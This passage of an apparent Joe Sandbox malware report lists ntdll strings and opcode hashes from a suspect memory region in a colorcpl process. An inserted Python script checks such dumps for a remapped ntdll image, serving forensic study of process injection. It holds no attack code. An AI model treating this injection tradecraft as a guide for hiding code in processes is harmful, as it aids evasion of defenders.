                                                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 227A8A3D
                                                                                                                                          • HandleTraces, xrefs: 227A8C8F
                                                                                                                                          • VerifierFlags, xrefs: 227A8C50
                                                                                                                                          • VerifierDebug, xrefs: 227A8CA5
                                                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 227A8B8F
                                                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 227A8A67
                                                                                                                                          • VerifierDlls, xrefs: 227A8CBD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                          • API String ID: 0-3223716464
                                                                                                                                          • Opcode ID: 9305fa0611d8dce55121e8bc363b218fbea09532eda08e1b0c5855c93dc5a83e
                                                                                                                                          • Instruction ID: 6a4980adf9399c918c2f2c065a0d2dc546b047cbb9ee3420d6ddfde623693998
                                                                                                                                          • Opcode Fuzzy Hash: 9305fa0611d8dce55121e8bc363b218fbea09532eda08e1b0c5855c93dc5a83e
                                                                                                                                          • Instruction Fuzzy Hash: 8891F27264E311EBD312CF68C9A0B0A77E4AF54724F810A68FA56AB2D1C738D904CBD5
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-792281065
                                                                                                                                          • Opcode ID: aafa3e1ed603ed5b63c67a6c054304466e731cbf07c3d494e83894d8c4e91a36
                                                                                                                                          • Instruction ID: 3d71d43a3204016f7220996816e2f8d23c45e871cead430647a89a68f1c8268d
                                                                                                                                          • Opcode Fuzzy Hash: aafa3e1ed603ed5b63c67a6c054304466e731cbf07c3d494e83894d8c4e91a36
                                                                                                                                          • Instruction Fuzzy Hash: A3915731A4D3119BEB16CF50E998BAA7BE0FF51728F100638EE017B2C9D7789901CB91
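Every Memory Dump Source entry in this part of the report points at the same region: process 10 (colorcpl), base 226F0000, reported as based on PE, with strings that belong to ntdll (minkernel\ntdll\ldrinit.c, _LdrpInitialize, LdrpInitializeExecutionOptions, RtlReAllocateHeap, the AVRF and SXS diagnostics). The first thing to establish from such a dump is whether the region holds a complete PE image and which module it claims to be: an ntdll image at a base the loader did not choose for ntdll is a second copy of the module, and that is worth confirming before reading the per-function hashes. The scanner below is an added example for that check, not part of the Joe Sandbox report: it walks a raw region dump at page boundaries, validates the DOS and NT headers, and reads the export-directory name. The dump bytes are constructed inline (a minimal fake image, not a real ntdll), and it assumes the dump is an image as mapped in memory, so that an RVA equals an offset from the image base; a file on disk would need section-table translation, which this does not do.

```python
"""Scan a raw memory-region dump for PE images and read each image's
export-directory module name. Added triage example for a sandbox region
dump such as ...226F0000.00000040.00001000.00020000.00000000.sdmp; not part
of the Joe Sandbox report. Assumption: RVA == offset inside the dump, as for
an image mapped in memory (not valid for a PE file on disk)."""
import struct
from typing import Iterator, List, Optional, Tuple

PAGE = 0x1000                            # images are mapped on page boundaries
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def _nt_header_offset(buf: bytes, base: int) -> Optional[int]:
    """Offset of the 'PE\\0\\0' signature for an image at base, or None."""
    if buf[base:base + 2] != b"MZ" or len(buf) < base + 0x40:
        return None
    (e_lfanew,) = struct.unpack_from("<I", buf, base + 0x3C)
    nt = base + e_lfanew
    return nt if buf[nt:nt + 4] == b"PE\0\0" else None


def export_name_at(buf: bytes, base: int) -> Optional[str]:
    """Export-directory module name (e.g. 'ntdll.dll') of the image at base,
    or None when the headers or the export table cannot be parsed."""
    nt = _nt_header_offset(buf, base)
    if nt is None:
        return None
    try:
        opt = nt + 4 + 20                    # signature + IMAGE_FILE_HEADER (20 bytes)
        (magic,) = struct.unpack_from("<H", buf, opt)
        if magic == PE32PLUS_MAGIC:
            dirs = opt + 112                 # DataDirectory start in IMAGE_OPTIONAL_HEADER64
        elif magic == PE32_MAGIC:
            dirs = opt + 96                  # DataDirectory start in IMAGE_OPTIONAL_HEADER32
        else:
            return None
        exp_rva, exp_size = struct.unpack_from("<II", buf, dirs)   # DataDirectory[0] = export
        if exp_rva == 0 or exp_size < 40:    # sizeof(IMAGE_EXPORT_DIRECTORY) == 40
            return None
        (name_rva,) = struct.unpack_from("<I", buf, base + exp_rva + 12)  # .Name at +12
        start = base + name_rva
        return buf[start:buf.index(b"\0", start)].decode("ascii")
    except (struct.error, ValueError, UnicodeDecodeError):
        return None


def find_pe_images(buf: bytes) -> Iterator[Tuple[int, Optional[str]]]:
    """Yield (offset, export_name) for every page-aligned PE header in buf.
    A stray 'MZ' without a valid NT signature is skipped."""
    for off in range(0, len(buf), PAGE):
        if _nt_header_offset(buf, off) is not None:
            yield off, export_name_at(buf, off)


def remapped_ntdll_offsets(buf: bytes) -> List[int]:
    """Offsets of images in buf that name themselves ntdll.dll. For a region
    the loader did not map as ntdll, a non-empty result is the indicator."""
    return [off for off, name in find_pe_images(buf)
            if name is not None and name.lower() == "ntdll.dll"]


def build_sample_image(export_name: bytes = b"ntdll.dll") -> bytes:
    """Constructed minimal PE32+ image (a stand-in, not a real ntdll): DOS
    header, NT headers with no sections, and an export directory whose
    Name field points at export_name."""
    img = bytearray(2 * PAGE)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                 # e_lfanew
    nt = 0x80
    img[nt:nt + 4] = b"PE\0\0"
    # IMAGE_FILE_HEADER: AMD64, 0 sections, SizeOfOptionalHeader=240, DLL flags
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x8664, 0, 0, 0, 0, 240, 0x2022)
    opt = nt + 24
    struct.pack_into("<H", img, opt, PE32PLUS_MAGIC)
    exp = 0x200
    struct.pack_into("<II", img, opt + 112, exp, 40)        # export DataDirectory
    name_rva = exp + 40
    struct.pack_into("<I", img, exp + 12, name_rva)         # IMAGE_EXPORT_DIRECTORY.Name
    img[name_rva:name_rva + len(export_name) + 1] = export_name + b"\0"
    return bytes(img)


def build_sample_dump() -> bytes:
    """Constructed region dump: a page of filler, the fake image, then a page
    that starts with 'MZ' but carries no NT signature (a decoy to ignore)."""
    return b"\x90" * PAGE + build_sample_image() + b"MZ" + b"\0" * (PAGE - 2)


if __name__ == "__main__":
    for off, name in find_pe_images(build_sample_dump()):
        print(f"PE image at region offset {off:#x}: export name {name!r}")
```

On a real dump, feed the file contents to find_pe_images and compare each hit against the process module list: an image at offset 0 naming itself ntdll.dll, in a region whose base is not where the module list places ntdll, is the finding to follow up. The converse does not clear a region: a dump that begins mid-image, or an image whose export table has been wiped, returns None here, so an absent name only means the header check was inconclusive.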
                                                                                                                                          Strings
                                                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 22792160, 2279219A, 227921BA
                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 227921BF
                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22792178
                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22792180
                                                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2279219F
                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 22792165
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                          • API String ID: 0-861424205
                                                                                                                                          • Opcode ID: 13a504dd8d9511ab085594b939d414581d1d627333c4b31c7da3421ca2256c58
                                                                                                                                          • Instruction ID: 4910889b6bb6bcc1a9875b45ea87acd5e6fea352f396ac0636688daa0ab042bc
                                                                                                                                          • Opcode Fuzzy Hash: 13a504dd8d9511ab085594b939d414581d1d627333c4b31c7da3421ca2256c58
                                                                                                                                          • Instruction Fuzzy Hash: B8310332F483157BF711DA959C84F9BBBB8DB75B94F010159BB08BB284D6B09E10CBA1
                                                                                                                                          Strings
                                                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 227981E5
                                                                                                                                          • LdrpInitializeProcess, xrefs: 2275C6C4
                                                                                                                                          • LdrpInitializeImportRedirection, xrefs: 22798177, 227981EB
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 2275C6C3
                                                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 22798170
                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 22798181, 227981F5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                          • API String ID: 0-475462383
                                                                                                                                          • Opcode ID: dd2599263a23931b002c3c8fe03923de821628dc2f6dd4fc1beab2b6c5eecf0a
                                                                                                                                          • Instruction ID: 5463ce8bf0fd22019ebc2223fa99b5b6e280fc4e55c4a28bcb593512342f914c
                                                                                                                                          • Opcode Fuzzy Hash: dd2599263a23931b002c3c8fe03923de821628dc2f6dd4fc1beab2b6c5eecf0a
                                                                                                                                          • Instruction Fuzzy Hash: E531C07274C345AFD311DF28D989E2AB7E4EF94714F000968FD45AB2D5EA20DD04C7A2
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 22762DF0: LdrInitializeThunk.NTDLL ref: 22762DFA
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22760BA3
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22760BB6
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22760D60
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22760D74
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1404860816-0
                                                                                                                                          • Opcode ID: 97869dc4f2c5191d04100a2cec58cff32d6c847bbd69cbe33318de9c41b8ec83
                                                                                                                                          • Instruction ID: 9a40d58b767c8623dc6aa15cd34bffb40bd35e9ff2292a80ca0e4c7e071a9f55
                                                                                                                                          • Opcode Fuzzy Hash: 97869dc4f2c5191d04100a2cec58cff32d6c847bbd69cbe33318de9c41b8ec83
                                                                                                                                          • Instruction Fuzzy Hash: 3D427B71904715DFEB21CF64C984BAAB7F5FF44314F0445AAE989EB241E770AA84CF60
                                                                                                                                          APIs
                                                                                                                                          • RtlGetReturnAddressHijackTarget.NTDLL ref: 22720564
                                                                                                                                          Strings
                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2272063D
                                                                                                                                          • kLsE, xrefs: 22720540
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHijackReturnTarget
                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                          • API String ID: 806345674-2547482624
                                                                                                                                          • Opcode ID: 63a1afb6cd6485cdf73e5d273ced1c47e56ea71933cab5c4440f2e013925d7b6
                                                                                                                                          • Instruction ID: 4ed81f9669cd86e25dea2e49eb612e99deb7af8b0d30c8c8c6bbb938e8a6f64e
                                                                                                                                          • Opcode Fuzzy Hash: 63a1afb6cd6485cdf73e5d273ced1c47e56ea71933cab5c4440f2e013925d7b6
                                                                                                                                          • Instruction Fuzzy Hash: 1951C171508B528FC314DF25C644B97B7E8AF94304F004A3EEAAA87245E734D645CFA2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                          • API String ID: 0-379654539
                                                                                                                                          • Opcode ID: d3dd68ba68c82d4fce431c823de75b843b465f14da47c916c5a42b939381d55f
                                                                                                                                          • Instruction ID: f1463162157e7a509602a0323f76ece1d5ce7a3a9c2dbded1dddb011135edde5
                                                                                                                                          • Opcode Fuzzy Hash: d3dd68ba68c82d4fce431c823de75b843b465f14da47c916c5a42b939381d55f
                                                                                                                                          • Instruction Fuzzy Hash: 0FC1AA7010C782CFE711CF19C644B6AB7E4FF94708F404A6AFA959B251E778CA49CB52
                                                                                                                                          Strings
                                                                                                                                          • LdrpInitializeProcess, xrefs: 22758422
                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2275855E
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 22758421
                                                                                                                                          • @, xrefs: 22758591
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-1918872054
                                                                                                                                          • Opcode ID: e33032d69adea94ceb8341951cdf92584a5c05cdb38b35476572ec62afcf4c6b
                                                                                                                                          • Instruction ID: 54720eca383dd687ca5c9b4e8bcf37d8f8f17a853b8515191e27ba0f387d91f5
                                                                                                                                          • Opcode Fuzzy Hash: e33032d69adea94ceb8341951cdf92584a5c05cdb38b35476572ec62afcf4c6b
                                                                                                                                          • Instruction Fuzzy Hash: 5A919C7154C351AFD722CF20C884F6BBBE8EB94784F80092EFA8496151E734DA54CB62
                                                                                                                                          Strings
                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 227922B6
                                                                                                                                          • .Local, xrefs: 227528D8
                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 227921D9, 227922B1
                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 227921DE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                          • API String ID: 0-1239276146
                                                                                                                                          • Opcode ID: 2b15d301669364cf7aeace2cb702dcdd9fa7f12ed8122faeb6a3c3e0b56277f4
                                                                                                                                          • Instruction ID: 09d035202d827b42c48c32b7254f685722da7f294cc8df459a8ce60ccecbb384
                                                                                                                                          • Opcode Fuzzy Hash: 2b15d301669364cf7aeace2cb702dcdd9fa7f12ed8122faeb6a3c3e0b56277f4
                                                                                                                                          • Instruction Fuzzy Hash: BAA18E359093299BCB25CF64D988B99B3B1BF68318F2101E9DD08BB351D7B09E91CF90
                                                                                                                                          Strings
                                                                                                                                          • RtlDeactivateActivationContext, xrefs: 22793425, 22793432, 22793451
                                                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 22793456
                                                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 2279342A
                                                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 22793437
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                          • API String ID: 0-1245972979
                                                                                                                                          • Opcode ID: 6cc92b114a1d939f88b9e55c1ff999698b4f34b4484f22d3e38489c847b73792
                                                                                                                                          • Instruction ID: 68d34d110024418add2fb362fde32db14ca5e3c6adf3a06a4e2a0bc8735ad2a3
                                                                                                                                          • Opcode Fuzzy Hash: 6cc92b114a1d939f88b9e55c1ff999698b4f34b4484f22d3e38489c847b73792
                                                                                                                                          • Instruction Fuzzy Hash: FD61233260DB119BC312CF18C995F2AF3E1EF81B54F518629ED94AF291DB30E911CBA1
                                                                                                                                          Strings
                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 22781028
                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 227810AE
                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 22780FE5
                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2278106B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                          • API String ID: 0-1468400865
                                                                                                                                          • Opcode ID: d8fe8cd9b17287c2b329544aa218d66e54128af2f481e5bdb14f58bbddc76824
                                                                                                                                          • Instruction ID: 1386447d3f75cf731c881020c6c3fb450b0efb0b8f3591e26dd78e2521d178ec
                                                                                                                                          • Opcode Fuzzy Hash: d8fe8cd9b17287c2b329544aa218d66e54128af2f481e5bdb14f58bbddc76824
                                                                                                                                          • Instruction Fuzzy Hash: 6471EEB190C3159FC711CF15C988F9B7BA8AF54764F400669FA488B28AD734DA88CBD2

Strings
• LdrpDynamicShimModule, xrefs: 2278A998
• TGo", xrefs: 22742462
• minkernel\ntdll\ldrinit.c, xrefs: 2278A9A2
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2278A992
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGo"$minkernel\ntdll\ldrinit.c
• API String ID: 0-1024064696
• Opcode ID: 1d3dc9bb798bf64dfa5253241b6814715433c53ad402cb2210613592375b9ad0
• Instruction ID: 60594e33f8b1cbfc2c9cfa066584878cae5b894d8978ac451bbd54a83db0a07c
• Opcode Fuzzy Hash: 1d3dc9bb798bf64dfa5253241b6814715433c53ad402cb2210613592375b9ad0
• Instruction Fuzzy Hash: 8E316B32A48311EBDB11CF58C984F6A7BB4FB84704F520559ED016B2C9CBBCD981DB81

Strings
• HEAP[%wZ]: , xrefs: 22733255
• HEAP: , xrefs: 22733264
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2273327D
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
• Opcode ID: 600fe5c7991e26c32b11b3e2162ee3ec0dbd9b8d658a7bc41bbe82b93578ed2b
• Instruction ID: 96f8e98159cbcaf8745e9429136c882861bf7f5b83d72df09d69483d786ebfce
• Opcode Fuzzy Hash: 600fe5c7991e26c32b11b3e2162ee3ec0dbd9b8d658a7bc41bbe82b93578ed2b
• Instruction Fuzzy Hash: 6E92BB71A08389DFDB26CF68C540BAEBBF1FF58304F148159E859AB292D774A941CF90

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
• Opcode ID: 2f3ca38e6d6cc2b9e22bd0740bb63bd8fdf4041321b75d498121d11cb47228ad
• Instruction ID: c57c752e4563d140356374e0990c30a14c336679f6f3a7e988e50cd740ead18e
• Opcode Fuzzy Hash: 2f3ca38e6d6cc2b9e22bd0740bb63bd8fdf4041321b75d498121d11cb47228ad
• Instruction Fuzzy Hash: 6DF18C70A08705DFDB16CF68C994F6AB7B6FF44704F1042A8E5169B392D734EA81CB92

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: $@
• API String ID: 0-1077428164
• Opcode ID: bee9fcd1e12b2b3d4c69381a6a1399b29abde04ce55ebc9531c12accd4b12d19
• Instruction ID: e6d31b4edf3a2e88d12040ceed3ad99e5bc05f1797b4f6e46e8894332326b312
• Opcode Fuzzy Hash: bee9fcd1e12b2b3d4c69381a6a1399b29abde04ce55ebc9531c12accd4b12d19
• Instruction Fuzzy Hash: ADC29C71A0D3819FD725CF24C981BABBBF5AF88744F448A2DE998D7241DB34D904CB92

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
• Opcode ID: 6af4b7885a267da1dc3ba3185b956a0ba4a5a05ef3bc8021910d6377b9244de9
• Instruction ID: 9671239bf07c1ec40ddf79ba45503a74ecfaad286c650824abecd19d47e3bbee
• Opcode Fuzzy Hash: 6af4b7885a267da1dc3ba3185b956a0ba4a5a05ef3bc8021910d6377b9244de9
• Instruction Fuzzy Hash: 4EA16E719053299BDF21DF64CD88BEAB7B8EF48704F1001EAEA09A7250D7359E84CF55

Strings
• LdrpCheckModule, xrefs: 2278A117
• Failed to allocated memory for shimmed module list, xrefs: 2278A10F
• minkernel\ntdll\ldrinit.c, xrefs: 2278A121
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
• Opcode ID: 4c33a80c553045c30415473b3e8c19e3c8c55d79c0913f0ec8aff08aba9e94f0
• Instruction ID: f68a7ce79f641e9a44229f5ba1fca622cf6dd33df1c6959be48ea5982be14389
• Opcode Fuzzy Hash: 4c33a80c553045c30415473b3e8c19e3c8c55d79c0913f0ec8aff08aba9e94f0
• Instruction Fuzzy Hash: CC71EE70E08305DFDB09CF68CA84BAEB7F4FB48304F144469D842EB295EB38AA45CB51

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
• API String ID: 0-1334570610
• Opcode ID: 9b48a18498f2414f6396d7d8315f8bc0a654454db88b62fb41ffe3fc33654c0b
• Instruction ID: a9d9bed2096228f081204ed7f4cc63c92d3c7d2228436c52e050ee58f29fe6ac
• Opcode Fuzzy Hash: 9b48a18498f2414f6396d7d8315f8bc0a654454db88b62fb41ffe3fc33654c0b
• Instruction Fuzzy Hash: A161F370A08301DFD71ACF28C984B9ABBE1FF45308F158559E8899F297D770E981CB95

Strings
• LdrpInitializePerUserWindowsDirectory, xrefs: 227982DE
• minkernel\ntdll\ldrinit.c, xrefs: 227982E8
• Failed to reallocate the system dirs string !, xrefs: 227982D7
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
• Opcode ID: 2caa493dd92eabed3f77e1076d21a10861cf99a7050717c3c518364f667d876f
• Instruction ID: f8b148fbf2f7e2ed7bc8d0a598095ede7a6fc436cd65ccfb9e6d55c04825b114
• Opcode Fuzzy Hash: 2caa493dd92eabed3f77e1076d21a10861cf99a7050717c3c518364f667d876f
• Instruction Fuzzy Hash: FE41FD72549311ABC722DB24C988B5BB7E8EF58750F000D2AFD99D72D5EB78D800CB91

Strings
• @, xrefs: 227DC1F1
• PreferredUILanguages, xrefs: 227DC212
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 227DC1C5
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
